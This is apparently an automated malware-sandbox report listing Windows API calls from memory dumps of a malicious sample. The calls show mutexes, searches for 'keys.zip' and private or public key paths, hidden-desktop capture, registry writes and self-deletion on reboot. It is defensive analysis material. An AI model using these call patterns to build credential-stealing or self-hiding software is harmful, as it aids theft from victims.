                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02BD43D2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD43D9
                                                                                                                                                                                                              • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                              • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 2697826820-558722157
                                                                                                                                                                                                            • Opcode ID: ec7718da124b7cbeca338823b7a0c946dc5e4db570f687e129eb06c797e714e0
                                                                                                                                                                                                            • Instruction ID: b536adbb3e2b29c4a9e3c37d333552d1454cbbda98eefc32dd8ab101ba52959a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec7718da124b7cbeca338823b7a0c946dc5e4db570f687e129eb06c797e714e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B41233194474A4FCB2ACB3C98657EA7BF5EF4A340F1585E4D9CAD7240EB719948C780
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\private\), ref: 02BCC139
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCC0E0,00000000,00000000,00000000), ref: 02BCC186
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\public\), ref: 02BCC19E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCC0C0,00000000,00000000,00000000), ref: 02BCC1E2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCC1FA
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCC20B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                            • String ID: \private\$\public\
                                                                                                                                                                                                            • API String ID: 677819612-281496920
                                                                                                                                                                                                            • Opcode ID: ae2d4ff977cc9f0ea8e629a68bd7412f92f78d85b1d0764283bfdf6f417f2a3b
                                                                                                                                                                                                            • Instruction ID: 177e6c263b4a866ab31c4313d69050087928241165e35e8611f7ad19d6fef5f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae2d4ff977cc9f0ea8e629a68bd7412f92f78d85b1d0764283bfdf6f417f2a3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E3108309813189BF7314A54EC05B553F58DB25F8CF25418AE789AE2D8C3B09485CBD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,698896B4a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 1287607259-2086362228
                                                                                                                                                                                                            • Opcode ID: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                            • Instruction ID: 333e9d3fe868d44870a1c9051d30b864e2d1ed92e265bd3d087039e5cf78d296
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF21B5B1940208ABEB55DB74CCC9EEE77BCEF18704F5085E8E295D7141E6B09EC88B50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD2827
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02BD2867
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 02BD2871
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2879
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD288A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?), ref: 02BD2891
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02BD289E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: keys.zip
                                                                                                                                                                                                            • API String ID: 4256651433-1589858953
                                                                                                                                                                                                            • Opcode ID: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                            • Instruction ID: 01bc7ae2ce25d04de7033877c2fd001da7a8103ffaf1952789f26f4e81343f12
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 532137749407898BCB218B389858BEB7BE8EF45340F1489E4EE86C7201EB71E950CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                            • GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 3748940024-4251816714
                                                                                                                                                                                                            • Opcode ID: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                            • Instruction ID: fa38084371705f11b52771540435dcac6ed2a32449c54d21f9b914d780291371
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6211E671E4022556DB32AA999C88BFEB75CEF403A5F8405A1FB41E71A0DBA0D45187E4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD32DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD32E5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD32F9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD330B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD3316
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0CE90,RFK), ref: 02BD3330
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BD3336
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • RFK, xrefs: 02BD331C
                                                                                                                                                                                                            • Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BD32D0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                            • API String ID: 4280258085-839244105
                                                                                                                                                                                                            • Opcode ID: d851bf9387663ccb64cd31b800e300c4ec0949fd2dafb49e3d6d7317ddd438b9
                                                                                                                                                                                                            • Instruction ID: e5f3505e36bb8d586936ede718d56222800243479ef625d727bec6d74768bb2b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d851bf9387663ccb64cd31b800e300c4ec0949fd2dafb49e3d6d7317ddd438b9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF0A730A857406BF2716B649C0AFCE77D8AF44B55F408594FB5AA2181DBF091158FA3
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02BCB91C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB925
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB939
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB94B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C15C), ref: 02BCB956
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C15C,ALPHA), ref: 02BCB970
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCB976
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ALPHA, xrefs: 02BCB95C
                                                                                                                                                                                                            • Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02BCB910
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                            • API String ID: 4280258085-2415181952
                                                                                                                                                                                                            • Opcode ID: 760cd4f3588a19daea1614159b9ae687f763a6df7bc0d97cc499e491f21613d5
                                                                                                                                                                                                            • Instruction ID: 3a77f1bfbcd2fcb96b817ff696ad4a5cd0a1d3e2c7431d53a11305d749f2a007
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 760cd4f3588a19daea1614159b9ae687f763a6df7bc0d97cc499e491f21613d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF0A7306C9711ABF6755B648C0BF5E77E8AF09B49F514548FB46A2280C7F095148BA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFEAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCFEB5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFEC9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCFEDB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774), ref: 02BCFEE6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C774,HANDY), ref: 02BCFF00
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCFF06
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • HANDY, xrefs: 02BCFEEC
                                                                                                                                                                                                            • Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BCFEA0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
                                                                                                                                                                                                            • API String ID: 4280258085-618671801
                                                                                                                                                                                                            • Opcode ID: 96b8f4f29f621cb51be7310fd729cbbd0831d1149b1291284fcf86a7c83a1e54
                                                                                                                                                                                                            • Instruction ID: ee5cc32cd87813c19420a1b5bcf981ce0188df0a3f5c1c3bc634620dc22ad828
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96b8f4f29f621cb51be7310fd729cbbd0831d1149b1291284fcf86a7c83a1e54
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8F027306C53026BF3705B645C0AF6E77C9EF05B48F508689FB8AA2480C7F481148BA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02BBFCE7,00000000,?,02BBFCE7,,-057FF5C8,00000000,00000000,02BBFCE7,?), ref: 02BBF0CD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                            • API String ID: 0-1412996494
                                                                                                                                                                                                            • Opcode ID: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                            • Instruction ID: afcf1763f7a27cd820df0c2b889e016f01bce188ef54a459f63945d2e06a6677
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09712531E00206ABEB268E68CC41BFA7BA6DF54318F5488D9F946D7650E7F1D941CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            • Opcode ID: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                            • Instruction ID: a8506eb30a948907720f85284b242b4ed1f92ba90abc5ff83915e04a16885d50
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7617E75A00609AFDB21CF68C890BFE7BA5FF49754F104498ED169B340D7B0EA41CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WindowFromDC.USER32(?), ref: 02BBC31C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBC354
                                                                                                                                                                                                            • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02BBC362
                                                                                                                                                                                                            • GetClipRgn.GDI32(?,00000000), ref: 02BBC36C
                                                                                                                                                                                                            • SelectClipRgn.GDI32(00000000,00000000), ref: 02BBC37C
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BBC383
                                                                                                                                                                                                            • GetViewportOrgEx.GDI32(?,?), ref: 02BBC38E
                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02BBC3A2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBC3E3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3315380975-0
                                                                                                                                                                                                            • Opcode ID: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                            • Instruction ID: 4beef16bbd8e3095bc5a758c7a560748fc3b2c91fc9631c2ab5733f262eff743
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF41FCB6641105AFCB64CF69DC84EAB77BDEF8C751B508609FA19D3240D670E850CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2787354276-0
                                                                                                                                                                                                            • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02BB9350
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8F3A
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F49
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteDC.GDI32(00000000), ref: 02BB8F57
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8F67
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F6F
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteDC.GDI32(?), ref: 02BB8F78
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: GetDC.USER32(00000000), ref: 02BB8F7C
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F8B
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F93
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FB4
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8FC3
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FDE
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8FFD
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: ReleaseDC.USER32(00000000,00000000), ref: 02BB900C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02BB937C
                                                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 02BB938B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB939E
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BB93B4
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BB93B7
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02BB93C6
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB93CF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02BB93DB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4064958368-0
                                                                                                                                                                                                            • Opcode ID: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                            • Instruction ID: ef8b85a6af4b34403e0eae7e694e3c698f7b79f1021d6453180773febc04cb90
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5115E75980205ABCA60AB79ECCCE6B37ACAB447907008E04B312872D5DAB4FC10CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                            APIs
